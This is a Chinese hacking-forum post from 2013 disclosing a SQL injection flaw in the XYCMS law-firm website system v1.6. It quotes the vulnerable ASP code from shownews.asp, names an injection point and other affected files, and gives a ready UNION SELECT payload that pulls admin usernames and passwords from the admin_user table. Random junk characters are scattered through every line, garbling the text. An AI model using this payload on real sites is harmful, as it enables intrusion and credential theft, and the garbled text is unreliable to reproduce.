找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2165|回复: 0
打印 上一主题 下一主题

XYCMS律师事务所建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
. \" N3 R+ ^$ r/ q- k . x* J% G, o' [3 [7 b  J! r- [
淫荡分割线( ]$ F/ w) d  Q" [1 y  L" T
--------------------------------------------------------
$ d* {' Z( B2 N, C/ S
% u! k7 E) V9 l- M) y9 {: ]审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)* G0 J1 `" v& [! T! B
源码地址:http://down.chinaz.com/soft/29233.htm
6 q+ B: p$ m8 c2 y5 `  Q" y 2 B6 |# g. I' k% f4 ]$ Y: I2 \
漏洞文件:shownews.asp. K' w) M/ M7 m* s4 i6 V+ m4 b
漏洞代码:7-13行
! T& P4 w7 y7 k- y+ I- D0 N2 t
9 A- J( g1 O9 n. N0 x" J1 m / v% Z% S1 i+ t: B& P' t* g* _
<%
% s9 y# _, x( L+ k( \id=request.QueryString("id")
) ?2 V7 f) v" G1 B& n9 G' V. u    1 W4 Y( ~2 k' E  B, M( w
set snews=server.createobject("adodb.recordset")
# A+ k, q& u: aexec="select * from [news] where id="&id3 e+ y+ |- [5 S0 {
snews.open exec,conn,1,17 r6 q5 H' y; g  A7 X: X- `
%>/ ?+ X9 k( k/ M' K% b( e3 K/ H& X( H
* a( ]$ o' |2 }/ p) J: q) ^% ^
; W, D- h) @6 m
什么过滤都没有  直造成注入$ _. P5 t; l, X9 P

8 u- w: z& R: w& _/ `注入点:http://127.0.0.1:99/shownews.asp?id=xx
2 J4 k$ G  _! \# e% | : Y# P% Y1 e+ m2 o" V/ J2 d% y
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
# |  k8 h1 M' l) B& N5 i
$ _: I; H- i3 g* M# b/ n! ?
- _  w9 W9 a; Y; aexp: union select 1,admin,password,4,5,7 from admin_user
3 \$ `" I, W# Q& j, e
! M  t3 N" T# K9 n( Y0 x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表